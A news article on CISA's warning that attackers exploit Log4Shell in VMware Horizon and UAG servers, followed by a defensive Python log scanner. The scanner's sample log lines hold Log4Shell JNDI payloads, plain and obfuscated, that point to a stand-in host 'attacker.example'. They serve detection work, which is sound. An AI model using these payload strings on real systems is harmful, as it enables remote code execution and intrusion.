The Cybersecurity and Infrastructure Security Agency (CISA), a United States federal agency, has warned that hackers still pose a significant cybersecurity threat, as threat actors (some of whom are backed by states) are targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell remote code execution vulnerability.
First discovered and disclosed in 2021, the Log4Shell bug (CVE-2021-44228) is a vulnerability in the Log4j Java logging library that lets an attacker inject commands into an application through strings the application routinely writes to its logs. Although most vendors have since patched the flaw, many applications remain vulnerable without their developers' knowledge, creating a supply chain threat.
Researchers from Trend Micro Security have also reported that members of the LockBit ransomware group have been linked to data ransom and extortion attempts.
Attackers can exploit Log4Shell remotely on vulnerable servers reachable from the local network or the Internet, then move laterally through the victim's network until they reach internal systems that hold sensitive data.
BleepingComputer, referring to a joint advisory released by CISA and the US Coast Guard Cyber Command (CGCYBER), also noted that multiple threat actors, including state-backed hacking groups, have been scanning for and exploiting unpatched systems in December 2021.
Assume Unpatched Systems are Already Compromised
CISA noted that once hackers managed to breach organisations’ networks, they would deploy malware strains providing them with remote access to deploy additional payloads and exfiltrate sensitive information.
“As part of this exploitation, suspected APT actors implanted loader malware on compromised systems, with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.”
CISA advised companies with unpatched systems to assume they were already compromised and to begin incident response immediately: isolate potentially affected systems, collect and review relevant logs and artifacts, hire third-party IR experts, and report the incident to CISA.
“CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1.”
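The threat hunting step above starts with the logs: because Log4Shell is triggered by a lookup string that the application writes to its log, reviewing request and application logs for that string (including the nested-lookup obfuscation attackers use to hide the `${jndi:` prefix) is a practical first check. The following detector is an added example, not code from CISA, CGCYBER or the article; the log lines, the `attacker.example` host and the `normalize` and `find_log4shell_attempts` helpers are constructed for this illustration.

```python
import re
from typing import List, Optional, Tuple

# Log4j 2 resolves ${...} lookups inside logged strings. Log4Shell abuses this
# with a JNDI lookup, and obfuscated variants hide the letters of "jndi" in
# nested lookups such as ${lower:J} or the default-value form ${::-j}, which
# Log4j resolves first. We replay that resolution before matching.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve one innermost lookup body; None means 'leave it as is'."""
    if body.lower().startswith("jndi:"):
        return None                      # keep the outer JNDI lookup visible
    if ":-" in body:                     # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out, bounded to avoid loops."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell_attempts(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for lines carrying a JNDI lookup."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1)
            if JNDI.search(normalize(line))]


# Constructed access-log lines (user-agent field carries the lookup string).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${${lower:J}ndi:${lower:L}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET /api/ HTTP/1.1" 200 "${java:version}"',   # benign lookup
]

if __name__ == "__main__":
    for n, line in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {n}: {line}")
```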
In addition, the agencies advised that affected organisations could reduce their attack surface by “hosting essential services on a segregated demilitarized (DMZ) zone, deploying web application firewalls (WAFs), and ensuring strict network perimeter access controls.”
These recent updates on ransomware attacks that use the Log4Shell vulnerability follow earlier reports of the Black Basta ransomware group targeting VMware servers.